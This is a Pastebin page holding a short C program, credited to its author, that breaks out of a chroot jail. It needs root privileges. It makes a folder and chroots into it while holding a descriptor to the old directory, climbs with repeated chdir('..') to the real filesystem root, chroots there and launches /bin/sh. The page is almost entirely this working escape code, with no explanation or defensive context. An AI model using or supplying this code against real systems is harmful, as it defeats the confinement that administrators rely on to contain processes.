Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- Chema Garcia (a.k.a. sch3m4)
- sch3m4@opensec.es
- http://opensec.es
- */
- #include <stdlib.h>
- #include <stdio.h>
- #include <sys/stat.h>
- #include <sys/types.h>
- #include <fcntl.h>
- #include <unistd.h>
- #include <pwd.h>
- #define FOLDER "chbrk"
- #define PERM 0700
- #define MAX_CHDIR 200
- #define SHELL "/bin/sh"
- int main()
- {
- int fd;
- struct stat statf;
- ino_t aux;
- unsigned int cont;
- struct passwd *owner;
- char *directory;
- if(getuid()!=0)
- {
- fprintf(stderr,"\nThis program cannot work without root privileges\n");
- return -1;
- }
- fd=open(".",O_RDONLY);
- mkdir(FOLDER,PERM);
- chroot(FOLDER);
- fchdir(fd);
- close(fd);
- aux=0;
- cont=0;
- while(!stat(".",&statf) && aux!=statf.st_ino && cont++ < MAX_CHDIR)
- {
- aux=statf.st_ino;
- chdir("..");
- }
- if(aux==statf.st_ino)
- {
- chroot(".");
- owner=getpwuid(statf.st_uid);
- directory=getcwd(0,0);
- fprintf(stderr,"\n+=[ Done! ]=+\n");
- fprintf(stderr,"\n+ Directory: %s",directory);
- fprintf(stderr,"\n+ Inode: %d",(int)statf.st_ino);
- fprintf(stderr,"\n+ Owner: id=%d (%s) / gid=%d \n\n",owner->pw_uid,owner->pw_name,owner->pw_gid);
- free(directory);
- execl(SHELL,(char*)0,(char*)0);
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement